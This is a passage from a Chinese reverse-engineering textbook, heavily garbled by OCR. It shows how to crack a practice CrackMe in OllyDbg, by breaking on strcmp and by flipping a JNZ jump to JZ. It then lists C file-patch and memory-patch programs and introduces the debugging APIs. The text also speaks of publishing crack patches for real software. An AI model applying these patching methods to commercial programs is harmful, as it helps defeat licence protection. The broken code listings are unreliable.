固定 的 密码 进行 一 一 对 应 。 生 成 密码 的 算法 非常 简单 ， 把 输入 的 账号 的 每 一 


加 1 运算 ,但 是 有 几 个 ASCII 值 除外 。 如 果 该 ASCII 码 是 字符 大 写 “Z” 


数字 “9”， 就 不 会 进行 加 1 运算 。 除 了 这 点 外 ， 要 求 账 号 的 长 度 必须 大 于 7 位 ， 


个 小 小 的 要 求 了 。 


有 固定 


的 账号 和 


个 ASCII 码 进行 


小 写 E 


z” 或 者 是 


这 也 算是 一 
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测试 一 下 。 输 入 一 个 小 于 7 位 的 账号 ， 再 随便 输入 一 个 密码 ， 单 击 “ 确 定 ” 按 钮 ， 这 时 
程序 不 会 有 任何 反应 。 那 么 , 这 次 输入 一 个 超过 7 位 的 账号 ， 
单 击 “ 确 定 ” 按 钮 来 试 试 ， 如 图 6-49 所 示 。 

CrackMe 提示 “密码 错误 ”。 当然 ， 密 码 是 根据 账号 算出 
来 的 ， 而 且 跟 账号 的 长 度 是 相等 的 。 那 么 ， 该 如 何 获得 这 个 
CrackMe 的 密码 呢 ? 如 果 这 个 CrackMe 不 是 自己 写 的 , 那 该 IE 
怎么 办 ? 想必 读者 都 知道 该 怎么 办 ， 接 下 来 的 工作 就 交 给 图 6-49 ”CrackMe 提示 错误 
OD 来 完成 。 


6.5.2 用 OD 破解 CrackMe 


对 于 破解 来 说 ， 总 是 要 找到 一 个 突破 点 。 而 对 于 这 个 简单 的 CrackMe 来 说 ， 突 破 点 是 非 
常 多 的 。 下 面 会 以 不 同 的 方式 来 开始 这 次 破解 之 旅 ， 不 需要 有 太 多 的 汇编 知识 ， 毕 竟 这 里 是 
基础 性 的 知识 。 要 想 深 入 学 习 破 解 ， 对 破解 有 所 了 解 的 话 ， 那 么 学 习 和 掌握 汇编 是 必修 课 。 

1. 破解 方法 一 

现在 用 OD 打开 所 编写 的 CrackMe， 如 图 6-50 所 示 。 















p 
1 

hh 
《jp -WMSUCRT0 ，except_handler3> SE 处 理 程序 安装 
eax, dword ptr Fs:[H) 

usi eax 

~ 64:8925 NON|nou dword ptr Fs:[9], esp 

33EA add esp. -%r 
ebx 


esi 
对 主 









PT 
ebp~ P012F FF 








Ns: 





TR ET 


图 6-50 用 OD 打开 CrackMe 后 的 界面 








还 记得 OD 中 各 个 窗口 的 作用 吗 ? 如 果 忘 记 ， 请 参考 第 5 章 的 内 容 。 用 OD 打开 CrackMe 
以 后 会 看 到 很 多 汇编 代码 , 这 部 分 内 容 可 以 通过 前 面 学 习 的 汇编 语言 和 逆向 知识 来 进行 阅读 。 
这 里 会 利用 前 面 介 绍 的 一 些 基 本 的 破解 技巧 ， 通 过 这 些 技巧 来 完成 破解 工作 。 

首先 来 梳理 一 下 思路 ， 梳 理 思 路 的 时 候 可 以 参考 上 面 写 的 代码 。 输 入 “账号 ”及 “密码 ” 
后 ， 首 先 程序 会 从 编辑 框 处 获得 “账号 ”的 字符 串 及 “密码 ”的 字符 串 ， 然 后 进行 一 系列 的 
比较 验证 ， 再 通过 “账号 ”来 计算 出 正确 的 “密码 ” 最 后 来 匹配 正确 的 “密码 ”与 输入 的 “ 密 
码 ” 是 否 一 致 ， 根 据 匹 配 结果 给 出 相应 的 提示 。 

上 面 是 编写 代码 的 流程 和 思路 ， 也 可 根据 这 个 思路 合理 地 设置 断 点 《设置 断 点 也 叫 下 断 
点 )。“ 断 点 ”就 是 产生 中 断 的 位 置 。 通 过 下 断 点 ， 可 以 让 程序 中 断 在 需要 调试 或 分 析 的 地 方 。 
下 断 点 在 调试 中 起 着 非常 大 的 作用 ， 学 会 在 合理 的 地 方 下 断 点 也 是 一 个 技巧 性 的 知识 ， 合 
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地 下 断 点 有 助 于 对 软件 进行 分 析 和 调试 ， 读 者 应 该 学 着 掌握 它 。 断 点 的 分 类 很 多 ， 有 内 存 断 
点 、 硬 件 断 点 、INT 3 断 点 …… 关于 断 点 的 知识 和 原理 ， 将 在 稍 后 的 内 容 中 进行 介绍 ， 这 里 
就 不 介绍 了 。 

现在 就 可 以 选择 合适 的 地 方 设置 断 点 了 。 可 以 在 API 函数 上 设置 断 点 , 比如 在 GetDlgItemText() 
行 设置 断 点 ， 也 可 以 选择 在 strlen() 上 设置 断 点 ， 还 可 以 在 stremp() 上 设置 断 点 ， 甚 至 可 以 在 
MessageBox() 上 设置 断 点 。 上 面 的 这 些 API 函数 都 是 可 以 设置 断 点 的 ， 但 是 对 于 GetDlgltemText() 
和 MessageBox(OI 函数 来 说 , 需要 下 断 点 的 时 候 指 定 是 ANSI 版 本 还 是 UNICODE 版 本 。 也 就 
是 说 , 系统 中 是 没有 这 两 个 函数 的 , 根据 版 本 的 不 同 存在 系统 的 函数 只 有 GetDlgItemTextA()、 
GetDlgltemTextW()、MessageBoxA() 和 MessageBoxW()。 通 常 使 用 ANSI 版 本 的 即 可 。 

上 面 有 如 此 多 的 API 函数 可 供 设置 断 点 ， 那 么 要 选择 哪个 进行 设置 呢 ? 最 好 的 选择 是 
strcmp(O 函 数 ， 因 为 在 比较 函数 处 肯定 会 出 现 正 确 的 “密码 ” 而 在 GetDlgItemTextA() 和 strlen() 
上 设置 断 点 ， 需 要 使 用 F8 进行 跟踪 。 如 果 在 MessageBoxA() 上 设置 断 点 ， 那 么 就 不 容易 找到 
正确 的 “密码 ” 存放 的 位 置 。 所 以 选择 在 stremp() 上 设置 断 点 。 在 “命令 ”窗口 中 输入 “bp stremp”， 
然后 按 回 车 键 ， 如 图 6-51 所 示 。 


— EE i 二 Break with 


图 6-51 在 “命令 ”窗口 设置 断 点 











如 何 知道 断 点 是 否 设置 成 功 呢 ? 按 下 Alt+B 组 合 键 , 打开 断 点 窗口 可 以 查看 , 如 图 6-52 
所 示 。 












让 全 edx, dword ptr [esp+4] 


地 址 ， | 模块 

19218B86 NSUCRTD -strcmp | HSUCRTD | 
| 

| 


| 
图 6-52 在 断 点 窗口 查看 所 下 断 点 





| 








断 点 已 经 设置 好 了 ， 那 么 就 按 F9 键 来 运行 程序 。CrackMe 启动 了 ， 输 入 一 个 长 度 大 于 
等 于 7 位 的 “账号 ;testtest”， 然 后 随便 输入 一 个 “密码 ，123456”，， 单 击 “ 确 定 ” 按 钮 ，OD 
中 断 在 断 点 处 ， 如 图 6-53 所 示 。 


edx, 1 

Short 18218BEC 

eax, dword ptr [edx] 
31, byte ptr [ecx] 
short 18218BC4 

al, al 

Short 192188BC6 
ah，byte ptr [ecx+1] 
short 102188C4 


ah, ah 
short 19218BC0 


T02188NT ~ C1E8 18 
| 


8 Qa1. 2 
| 淮 栈 ss:[8812F344]=8012F39C，(ASCIT tu ) 
edx=0812F39C (ASCIT “uftuuftu") 








图 6-53 ”OD 响应 了 断 点 被 断 下 


从 图 6-53 中 可 以 看 到 ，OD 断 在 了 stremp 函数 的 首 地 址 处 ， 地址 为 10217570。 当 OD 被 








6.5 破解 基础 知识 及 调试 API 函数 的 应 用 





断 下 后 ， 在 菜单 栏 的 下 方 会 看 到 “暂停 ”字样 的 状态 。 断 在 这 里 如 何 找到 真正 的 密码 呢 ? 其 
实在 提示 的 地 方 已 经 显示 出 了 正确 的 密码 ， 也 可 以 通过 查看 栈 窗口 来 找到 正确 的 密码 。 函 数 
参数 的 传递 是 依赖 于 栈 的 。 对 于 C 语言 来 说 ， 函 数 的 参数 是 从 右 往 左 依次 入 栈 的 。stremp() 
函数 有 两 个 参数 ,分别 是 要 进行 比较 的 字符 串 。 在 栈 窗口 中 可 以 看 到 输入 的 密码 及 正确 的 密 
码 ， 如 图 6-54 所 示 。 

可 以 看 到 ， 在 调用 strcmp(O 时 ， 传 递 的 两 个 参数 的 值 分 别 是 “123456” 和 “uftuuftu” 两 
个 字符 串 。 前 面 的 字符 串 肯 定 是 输入 的 密码 ， 那 么 后 面 的 字符 串 肯 定 就 是 正确 的 密码 了 。 按 
F9 刍 运 行程 序 ， 会 出 现 对 话 框 提示 密码 错误 。 现 在 关闭 OD， 直 接 打 开 CrackMe。 仍 然 用 刚 
才 的 账号 “testtest”， 然 后 输入 密码 “uftuuftu”， 单 击 “ 确 定 ” 按 钮 ， 会 提示 “密码 正确 ”如 
图 6-55 所 示 。 







9912F338| ed 
ONT2F S30| S0481D9D 







BOT2F344| B02 
H812F348| 0012F496|Ls2 
BO12F 98P| BO12F950| 








图 6-54 栈 窗口 中 显示 出 的 两 个 密码 图 6-55 ”密码 正确 





这 样 就 完成 了 破解 。 这 种 方法 比较 简单 ， 只 要 在 stremp() 函 数 处 设置 断 点 即 可 。 读 者 可 
以 试 着 在 其 他 几 个 API 函数 处 设置 断 点 ， 然 后 试 着 找到 正确 的 注册 码 。 接 下 来 ， 尝 试 使 用 另 
外 的 方法 来 对 CrackMe 进行 破解 。 

2. 破解 方法 二 

在 上 一 种 方法 中 ， 通 过 对 API 函数 设置 断 点 找到 了 正确 的 密码 。 现 在 通过 提示 字符 串 来 
完成 破解 。 在 不 知道 正确 密码 的 情况 下 输入 密码 ， 通 常会 得 到 的 提示 字符 串 是 “密码 错误 ”。 
只 要 在 程序 中 寻找 该 字符 串 ， 并 且 查 看 是 何 处 使 用 了 该 字符 串 ， 那 么 就 可 以 对 破解 起 到 提示 
性 的 作用 。 

用 OD 打开 CrackMe 程序 ， 然后 在 反 汇编 界面 处 单 击 鼠 标 右键 ,在 弹出 的 菜单 中 依次 选 
择 “Ultra String Reference” 一 “Find ASCII” 命 令 ， 会 出 现 “Ultra String Reference” 窗 口 ， 
如 图 6-56 所 示 。 










word ptr Teax), O0415064 


Sword ptr feaxl, O0415204 
ord ptr [ecxl, O0415308 
6 


pe 
O0416694 |appmodul .cpp 
图 6-56 “Ultra String Reference” 窗 口 


在 “Ultra String Reference” 窗 口中 可 以 看 到 两 个 非常 熟悉 的 字符 串 ， 双 击 “ 密 码 正确 ” 
字符 串 ， 来 到 00401EAE 地 址 处 ， 该 地 址 内 容 如 图 6-57 所 示 。 
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BaniE7al| 
了 89 人 4E 273] | < 
DohBtETE | 
NOMERS 
WOMYTERE| 
HIE 


QFBE948D FCFI| mousx 





Me， 


~ E9 62FFFFFF | 
BD8D FCFDFFFI 
1 


vv 














HONR1EY9E | 5 ‘push ecx 

MGTEV7 | . BD95 FCFCFFFI lea edx, 

AABIEGD|| . push edx 

WUBuTE9E | | . Es nD899999 | Ga <jmp .&MSUERTD .strcmp> 
HAMATEAS|| . 83Ch O08 dd 

DDMOTEAE!| . test eax, eax 

TE jnz short 08861EBD 
NOMATEAA ‘push 9 


从 生生 和 和 下 从 





SBYEBS| | - 和 
MYATEBO|| - 

088NYEBB|| . 
TE BD 
BONGTEBF|| - 有 
WABIELT| 。 68 19544168 | push 895T5NTB 
村 内 系 从 4 共和 在。 888D FC mov ecx, NM 


G4NIER9)| . ES 82839996 Ga <jnp-&MFCh2D -#3517> 
图 6-57 00401EAE 地 址 处 反 汇编 


‘jmp short S04091ECE 
push 县 























从 图 6-57 中 可 以 看 到 3 处 比较 关键 性 的 内 容 ， 第 一 个 是 stremp() 函 数 ， 第 二 个 是 字符 串 
“密码 正确 ”， 第 三 个 是 字符 串 “ 密 码 ” 错 误 。 由 这 3 个 内 容 可 以 联想 到 ， 这 和 C 代码 基本 上 
是 对 应 的 。 根 据 stremp() 的 比较 结果 ，if...else... 会 选择 不 同 的 流程 执行 。 也 就 是 说 ， 只 要 改 
变 比 较 的 结果 或 者 更 换 比 较 的 条 件 ， 都 可 以 改变 程序 的 流程 。 下 面 主要 讲述 修改 比较 条 件 的 


方法 ， 拿 具体 的 例子 来 解释 ， 具 体 代码 如 下 : 

/7 把 生成 的 密码 和 输入 的 密码 进行 匹配 

if ( stremp(szTmpPassword, szPassword) == 0 ) 

: MessageBox ("密码 正确 ") ; 

MessageBox ("密码 错误 ") ; 

stremp() 是 字符 串 比较 函数 。 如 果 两 个 字符 串 相 等 ， 也 就 是 说 ,输入 的 密码 与 正确 的 密码 

匹配 ， 则 执行 “密码 正确 ”流程 ;否则 反之 。 修 改 一 下 比较 的 条 件 ， 也 就 是 说 ， 两 个 密码 匹 
配 不 成 功 ， 使 其 执行 “密码 成 功 ”的 流程 。 这 样 ， 输 入 错误 的 密码 也 会 提示 “密码 正确 ”。 在 


C 语言 中 的 修改 很 简单 ， 只 要 修改 为 如 下 代码 即 可 : 


tf (Eten Tm assWeird SPassworal ls 区) 

但 是 对 于 反 汇 编 应 该 如 何 做 呢 ? 其 实 非 常 简单 ， 再 看 一 下 图 6-57 中 的 那儿 条 反 汇 编 代 
码 。 想 要 修改 其 判断 条 件 ， 只 要 修改 00401EA8 处 的 指令 代码 JNZ SHORT 00401EBD 即 可 。 
该 指令 的 意思 是 如 果 比 较 结果 不 为 0， 则 跳 转 到 00401EBD 处 执行 。JNZ 指令 是 结果 不 为 0 
则 跳 转 ， 只 要 把 JNZ 修改 为 也 即 可 ，J2 的 意思 刚好 与 JNZ 相反 。 修 改 方法 很 简单 ， 选 中 
00401EA8 地 址 所 在 的 行 ， 按 下 空格 键 即 可 进行 编辑 ， 如 图 6-58 所 示 。 

单 击 窗口 上 的 “汇编 ”按钮 ， 然 后 按 F9 键 运 行 ， 随 便 输 入 一 个 长 度 大 于 7 位 的 账号 ， 
再 输入 一 个 密码 ， 然 后 单 击 “ 确 定 ” 按 钮 ， 会 提示 “密码 正确 ”， 如 图 6-59 所 示 。 














和 汇编 于 此 处 : 00401EAR 
iz short OD401EED 





图 6-58 在 OD 中 修改 反 汇编 代码 图 6-59 ”修改 指令 后 的 流程 


区 使 用 RDP 填充 








6.5 破解 基础 知识 及 调试 API 函数 的 应 用 





关 掉 OD 和 CrackMe， 然 后 直接 运行 CrackMe， 随 便 输 入 账号 和 密码 ， 单 击 “ 确 定 ” 按 
钮 后 提示 密码 错误 。 为 什么 呢 ? 因为 刚才 只 是 在 内 存 中 进行 了 修改 ， 需 要 对 修改 后 的 文件 进 
行 存盘 ， 这 样 在 以 后 运行 时 ， 该 修改 才 有 效 。 
修改 后 的 存盘 方法 为 ， 选 中 修改 的 反 汇编 代码 9 
(可 以 多 选 几 行 ， 只 要 修改 的 那 行 被 选中 即 可 )， seston 


| Ea 15030000 
EB 11 


然后 单 击 右键 ， 在 弹出 的 菜单 中 选择 “复制 到 
可 执行 文件 ”一 “ 选 定 内 容 ” 命 令 ， 会 出 现 “ 文 


SS E00 





E A O00 
1| €8 10544100 
3B4D EC 








件 ” 对 话 框 ， 如 图 6-60 所 未 5 于 0Q2030000 
在 这 个 对 话 框 中 单 击 鼠标 右键 ， 在 弹出 的 :| aas eaoaooon | 











菜单 中 选择 “保存 文件 ”命令 ， 然 后 进行 保存 。 | SS 攻 

这 样 修改 就 存盘 了 。 下 次 在 执行 该 程序 时 , 随 ”一 

便 输入 大 于 7 位 的 账号 和 密码 ， 都 会 提示 “ 密 

码 正确 ”。 如 果 输 入 了 正确 的 密码 ， 那 么 会 提示 “密码 错误 ”。 
上 面 就 是 两 种 破解 CrackMe 的 方法 ， 这 两 种 方法 都 是 极其 简单 的 方法 ， 现 在 可 能 已 经 很 

不 实用 了 。 这 里 是 为 了 学 习 ， 提 高 动手 能 力 ， 而 采用 了 这 两 种 方法 。 


6.5.3 文件 补丁 及 内 存 补 丁 


有 时 破解 一 个 程序 后 可 能 会 将 其 发 布 ， 而 往往 被 破解 的 程序 只 是 修改 了 其 中 一 个 程序 而 
已 ， 无 须 将 整个 软件 都 进行 打包 再 次 发 布 ， 只 需要 发 布 一 个 补丁 程序 即 可 。 发 布 补丁 常见 的 
有 三 种 情况 , 第 一 种 情况 是 直接 把 修改 后 的 文件 发 布 出 去 , 第 二 种 情况 是 发 布 一 个 文件 补丁 ， 
它 去 修改 原始 的 待 破解 的 程序 ， 最 后 一 种 情况 是 发 布 一 个 内 存 补丁 ， 它 不 修改 原始 的 文件 ， 
而 是 修改 内 存 中 的 指定 部 分 。 

3 种 情况 各 有 好 处 。 第 一 种 情况 将 已 经 修改 后 的 程序 发 布 出 去 ， 使 用 者 只 需要 简单 进行 
蔡 换 就 可 以 了 。 但 是 有 个 问题 ， 如 果 程序 的 版 本 较 多 ， 直 接替 换 可 能 就 会 导致 蔡 换 后 的 程序 
无 法 使 用 。 第 二 种 方法 是 发 布 文件 补丁 ， 该 方法 需要 编写 一 个 简单 的 程序 去 修改 待 破 解 的 程 
序 ， 在 破解 以 前 可 以 先 对 文件 的 版 本 进行 判断 ， 如 果 补 丁 和 待 破解 程序 的 版 本 相同 则 进行 破 
解 ， 否 则 不 进行 破解 。 但 是 有 时 候 修改 了 文件 以 后 ， 程 序 可 能 无 法 运行 ， 因 为 有 的 程序 会 对 
自身 进行 校 验 和 比较 ， 当 校 验 和 发 生变 化 后 ， 程 序 则 无 法 运行 。 最 后 一 种 方式 是 内 存 补丁 ， 
也 需要 自己 动手 写 程序 ， 并 且 写 好 的 补丁 程序 需要 和 待 破解 的 程序 放 在 同一 个 目录 下 ， 执 行 
待 破解 的 程序 时 ， 需 要 执行 内 存 补丁 程序 ， 内 存 补丁 程序 会 运行 待 破解 的 程序 ， 然 后 比较 补 
丁 与 程序 的 版 本 ， 最 后 进行 破解 。 同 样 ， 如 果 有 内 存 校 验 的 话 ， 也 会 导致 程序 无 法 运行 。 不 
过 ， 无 论 是 文件 校 验 还 是 内 存 校 验 ， 都 可 以 继续 对 被 校 验 的 部 分 进行 打 补 丁 来 突破 程序 校 验 
的 部 分 。 不 过 这 不 是 本 部 分 的 重点 ， 这 里 的 重点 是 编写 一 个 针对 上 一 节 程 序 的 文件 补丁 程序 
和 内 存 补丁 程序 。 

1. 文件 补丁 

用 OD 修改 CrackMe 是 比较 容易 的 ， 如 果 脱 离 OD 该 如 何 修改 呢 ? 其 实在 OD 中 修改 反 
汇编 的 指令 以 后 ， 对 应 地 ， 在 文件 中 修改 的 是 机 器 码 。 只 要 在 文件 中 能 定位 到 指令 对 应 的 机 
器 码 的 位 置 ， 那么 直接 修改 机 器 码 就 可 以 了 。JNZ 对 应 的 机 器 码 指令 为 0x75，JZ 对 应 的 机 器 





图 6-60 “文件 ”对 话 框 





册 改 灿 遇 雪山 加 站 
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码 指令 为 0x74。 也 就 是 说 ,只 要 在 文件 中 找到 这 个 要 修改 的 位 置 ， 用 十 六 进 制 编辑 器 把 0x75 
修改 为 0x74 即 可 。 如 何 能 把 这 个 内 存 中 的 地 址 定位 到 文件 地 址 昵 ? 这 就 是 前 面 介 绍 的 PE 文 
牛 结构 中 把 VA 转换 为 FileOffset 的 知识 了 。 

具体 的 手动 步骤 ， 请 读者 自己 尝试， 这 里 直接 通过 写 代码 进行 修改 。 为 了 简单 起 见 ， 这 
里 使 用 控制 台 来 编写 ， 而 且 直接 对 文件 进行 操作 ， 省 略 中 间 的 步骤 。 想 必 有 了 思路 以 后 ， 对 
于 读者 来 说 就 不 是 难事 。 

关于 文件 补丁 的 代码 如 下 : 


#include <windows.h> 
#inciude <stdio.h> 














一 人 











int "main(int,arge, char* argw[ll]) 
// VA = 00401EA8 
// FileOoffset = 00001EA8 
DWORD dwFileOffset = OQx00001EA8; 
BYTE bCode = .07 
DWORD dwReadNum = 07; 


// 判断 参数 

说 站 前 村 人 二 到 

{ 
printf ("Please input two argument \r\n"); 
al ob ods We 

} 


人/ 牺 再 文件 

HANDLE hFEile = CreateFilel(argv[1], 
GENERIC READ | GENERIC WRITE, 
FILE _ SHARE READ, 
NUT 
OPEN EXISTING, 
FILE ATTRIBUTE NORMAL, 
NULL); 


TE Mt Elier ss TNVALIDIHANDLE VATUE) 
{ 


PoEurnl Ly 


» 
SetFEilePointer(hFile, dwFileOffset, 0, FILE BEGIN); 
ReadFile(hFile; (LEVOID) gbCode, sizeof (BYTE), &dwReadNum, NULL); 


// 比较 当前 位 置 是 否 为 JNZ 

i bea Ve NY 

:| 
Drinta( "A NPM BOCode)s 
CloseHandle (hFile); 
return = 


} 

// 修改 为 JZ 

pCode = NET7477》 

SetFilepPpointer (hrile, dwFileOffset, 0, FILE BEGIN); 
WriteFile(hFile, (LPVOID) gbCode, sizeéof (BYTE), &dwReadNum, NULL)? 
printf("Weite ds Ls SucecessEully ! NeNnm); 

CloseHandle (hFile); 


jy 运行 
WinExec(argv[1], SW_SHOW); 








6.5 破解 基础 知识 及 调试 API 函数 的 应 用 














getchar ();} 
第 
returrn 07 | 6 
章 
代码 给 出 了 详细 的 注释 ， 只 需要 把 ， 和 
CrackMe 文件 拖 放 到 文件 补丁 上 或 者 在 命令 【于 Pa 加 
行 下 输入 命令 即 可 ， 如 图 6-61 所 示 。 外 
通常 ， 在 做 文件 补丁 以 前 一 定 要 对 打算 密 
进行 修改 的 位 置 进行 比较 ， 以 免 产 生 错 误 的 
修改 。 程 序 使 用 的 方法 是 将 要 修改 的 部 分 读 人 
出 来 ， 看 是 否 与 用 OD 调试 时 的 值 相 同 ， 如 pe 
i ed a 图 6-61 对 CrackMe 进行 文件 补 本 
果 相 同 则 打 补 丁 。 由 于 这 里 只 是 介绍 编程 知 
识 ， 针 对 的 是 一 个 CrackMe。 如 果 对 某 个 软件 进行 了 破解 ， 自 己 做 了 一 个 文件 补丁 发 布 出 去 
给 别人 使 用 ， 不 进行 相应 的 判断 就 直接 进行 修改 ， 很 有 可 能 导致 软件 不 能 使 用 ， 因 为 对 外 发 
布 以 后 不 能 确认 别人 所 使 用 的 软件 的 版 本 等 因素 。 因 此 ， 在 进行 文件 补丁 时 最 好 判断 一 下 ， 
或 者 是 用 CopyFile0 对 文件 进行 备份 。 
2 内 存 补丁 
相对 文件 补丁 来 说 ,还 有 一 种 补丁 是 内 存 补丁 。 这 种 补丁 是 把 程序 加 载 到 内 存 中 以 后 对 其 
进行 修改 ， 也 就 是 说 ， 本 身 是 不 对 文件 进行 修改 的 。 要 将 CrackMe 载 入 内 存 中 ， 载 入 内 存 可 以 
调用 CreateProcess() 函 数 来 完成 ， 这 个 函数 参数 众多 ， 功 能 强大 。 使 用 CreateProcess() 创 建 一 个 
子 进程 ， 并 且 在 创建 的 过 程 中 将 该 子 进程 暂停 ， 那 么 就 可 以 安全 地 使 用 WriteProcessMemory() 
函数 来 对 CrackMe 进行 修改 了 。 整 个 过 程 也 比较 简单 ， 下 面 直接 来 阅读 源 代码 : 
#include <Windows.h> 
#include <stdio.h> 
int mainl(int argcr char* argv[]) 
| 
// VA = 004024D8 | 
DWORD dwVvAddress = 0x00401EA8; 
BYTE bECode = 0» 
DWORD dwReadNum = 07 
// 判断 参数 数量 
if ( arge t= 2 
{ 
printf ("Please input two argument Nr\n"); 
必 总 丰富 于 二 于 | 
} 
STARTUPINFO s = {0 7 
Si.cb = sizeof (STARTUPINEO); 
si.wShowWindow = SW_ SHOW; 
si.dwFlags = STARTF USESHOWWINDOW; 
PROCESS INFORMATION pi = { 0 }; 
BOOL bRet = CreateProcess (argv[1], 
NULEL, 
NULE, 
NULL 
FAELSE, 
CRERATE_SUSPENDED，  // 将 子 进程 暂停 
NULL;, 
i a 二 a ls 
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NULL, 
&si, 
&pi); 


if ( bRet == FALSE ) 

{ 
printf ("CreateProcess Error 1 \r\n"); 
return = 

} 


ReadProcessMemory (pi.hProcess, 
(LPEVOTID)dwVAddress, 
(LPVOID) &bCode, 
sizeof (BYTE), 
tdwReadNum) ; 


// 判断 是 否 为 JNZ 

LE MDCode -EN |) 

{ 
printf("%02X \r\n", bCode); 
CloseHandle (pi.hThread); 
CloseHandle (pi.hPprocess); 
TetUrn = 


} 


// 将 JNZ 修改 为 IJZ 

bCode = '\x74'; 

WriteProcessMemory (pi.hProcess; 
(EPVOID) dwVvAddress, 
(LEVOID) &bCode, 
Sizeof (BYTE), 
&dwReadNum); 


[EN 


| 


ResumeThread (pi.hThread); 





CloseHandle (pi.hThread); 
CloseHandle (pi.hProcess); 


printf ("Write JZ is Successfully ! \r\n"); 
getchar (); 


Teturn 0 


} 
代码 中 的 注释 也 比较 详细 ， 代 码 的 关键 是 要 进行 比较 ， 否 则 会 造成 程序 的 运行 衣 演 。 在 
| ”进行 内 存 补丁 前 需要 将 线程 暂停 ， 这 样 做 的 好 处 是 有 些 情况 下 可 能 没有 机 会 进行 补丁 就 已 经 
| 执行 完 需 要 打 补 丁 的 地 方 了 。 当 打 完 补丁 以 后 ， 再 恢复 线程 继续 运行 就 可 以 了 。 

文件 补丁 与 内 存 补 丁 已 经 介绍 完了 。 这 两 种 补丁 ， 都 是 通过 前 面 学 到 的 知识 来 完成 的 ， 
可 见 前 面 的 基础 知识 的 用 处 还 是 非常 广泛 的 。 用 了 这 么 多 的 篇 幅 来 介绍 使 用 OD 破解 
CrackMe， 也 介绍 了 文件 补丁 和 内 存 补丁 ， 那 么 , 接 下 来 就 开始 学 习 调 试 API。 掌 握 调试 API 
以 后 ， 就 可 以 打造 一 个 类 似 于 OD 的 应 用 程序 调试 器 ， 下 面 来 一 步 一 步 学 习 。 


6.6 调试 API 本数 的 使 用 


Windows 中 有 些 API 函数 是 专门 用 来 进行 调试 的 ， 被 称 作 Debug API, 或 者 是 调试 API。 
利用 这 些 函 数 可 以 进行 调试 器 的 开发 ， 调 试 器 通过 创建 有 调试 关系 的 父子 进程 来 进行 调试 ， 








6.6 调试 API 函数 的 使 用 





被 调试 进程 的 底层 信息 、 即 时 的 寄存 器 、 指 令 等 信息 都 可 以 被 获取 ， 进 而 用 来 分 析 。 

上 面 介绍 的 OllyDbg 调试 器 的 功能 非常 强大 ， 虽 然 有 众多 的 功能 ， 但 是 其 基础 的 实现 就 
是 依赖 于 调试 API。 调 试 API 函数 的 个 数 虽 然 不 多 ， 但 是 合理 使 用 会 产生 非常 大 的 作用 。 调 
试 器 依赖 于 调试 事件 ， 调 试 事件 有 着 非常 复杂 的 结构 体 。 调 试 器 有 着 固定 的 流程 ， 由 于 实时 
需要 等 待 调试 事件 的 发 生 , 其 过 程 是 一 个 调试 循环 体 , 非常 类 似 于 SDK 开发 程序 中 的 消息 循 
环 。 无 论 是 调试 事件 还 是 调试 循环 ， 对 于 调试 或 者 说 调试 器 来 说 ， 其 最 根本 、 最 核心 的 部 分 
是 中 断 ， 或 者 说 其 最 核心 的 部 分 是 可 以 捕获 中 断 。 


6.6.1 常见 的 3 种 产生 断 点 的 方法 


在 前 面 介绍 OD 的 时 候 提 到 过 ， 产 生 中 断 的 方法 是 设置 断 点 。 常 见 的 产生 中 断 的 断 点 方 
法 有 3 种 ， 分 别 是 中 断 断 点 、 内 存 断 点 和 硬件 断 点 。 下 面 介绍 这 3 种 断 点 的 不 同 。 

中 断 断 点 ， 这 里 通常 指 的 是 汇编 语言 中 的 int 3 指令 ，CPU 执行 该 指令 时 会 产生 一 个 断 
点 ， 因 此 也 常 称 之 为 INT3 断 点 。 现 在 演示 如 何 使 用 int 3 来 产生 一 个 断 点 ， 代 码 如 下 : 


rnt maln(int arge,l Char) argwv[]) 
{ 


ra $s th oY os} 


return 0; 


} 

代码 中 使 用 了 asm, 在 ”asm 后 面 可 以 使 用 汇编 指令 。 如 果 想 添加 一 段 汇编 指令 , 方法 
是 _asm{}。 通过 ”asm 可 以 在 C 语言 中 进行 内 肉 汇 编 语言 。 在 _asm 后 面 直 接 使 用 的 是 int 3 
间 令 ， 这 样 会 产生 一 个 异常 ， 称 为 断 点 中 断 异 常 。 对 这 段 简单 的 代码 进行 编译 连接 ， 并 且 运 
行 。 运 行 后 出 现 错误 对 话 框 ， 如 图 6-62 所 示 。 


int 3. exe 刀 到 问题 需要 关闭 。 我 们 对 此 引起 的 不 便 表示 抱 
鞭 。 






图 6-62 异常 对 话 框 














/py 注 : 图 6-62 所 示 的 异常 对 话 框 中 通过 链接 “请 单 击 此 处 ”可 以 打开 详细 的 异常 报告 。 如 果 读 者 电脑 与 此 

处 显示 的 对 话 框 不 同 ， 请 依次 进行 如 下 设置 :在 “我 的 电脑 ”上 单 击 右键 ， 在 弹出 的 菜单 中 选择 “属性 ”， 
打开 “属性 ”对 话 杠 ,选择 “高 级 ”选项 卡 ， 选 择 “ 错 误 报告 ”按钮 打开 “错误 汇报 ”界面 ， 在 该 界面 
上 选择 “启用 错误 汇报 ” 单 选 按钮 ， 然 后 单 击 确定 。 通 过 这 样 的 设置 ， 就 可 以 启动 “异常 对 话 框 ”了 。 对 
于 分 析 程 序 的 BUG、 挖 气 软 件 的 漏洞 ， 弹 出 异常 对 话 框 界面 是 非常 有 用 的 。 


这 个 对 话 框 可 能 常常 见 到 ， 而 且 见 到 以 后 多 半 会 很 让 人 郁 间 ， 通 常情 况 是 直接 单 击 “ 不 
发 送 ” 按 钮 ,然后 关闭 这 个 对 话 框 。 在 这 里 ， 这 个 异常 是 通过 int 3 导致 的 , 不 要 忙 着 关 挥 它 。 
通常 在 写 自 己 的 软件 时 如 果 出 现 这 样 的 错误 ， 应 该 去 寻找 更 多 的 帮助 信息 来 修正 错误 。 单 击 
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“请 单 击 此 处 ”链接 ， 出 现 如 图 6-63 所 示 的 对 话 框 。 








图 6-63 “异常 基本 信息 ”对 话 框 


弹出 “异常 基本 信息 ”对 话 框 ， 因 为 这 个 对 话 框 给 出 的 信息 实在 太 少 了 ， 继 续 单 击 “ 要 
查看 关于 错误 报告 的 技术 信息 ”后 面 的 “请 单 击 此 处 ”和 链接， 打开 如 图 6-64 所 示 的 对 话 框 。 
通常 情况 下 ， 在 这 个 报告 中 只 关心 两 个 内 容 ， 一 是 Code， 三 是 Address。 在 图 6-64 中 ， 
Code 后 面 的 值 为 0x80000003，Address 后 面 的 值 为 0x0000000000401028。Code 的 值 为 产生 
异常 的 异常 代码 ，Address 是 产生 异常 的 地 址 。 在 Winnt.h 中 定义 了 关于 Code 的 值 ， 在 这 里 


0x80000003 的 定义 为 STATUS _BREAKPOINT， 也 就 是 断 点 中 断 。 在 Winnth 中 的 定义 为; 
#define STATUS B GTNT ((DWORD)Ox800000033) 


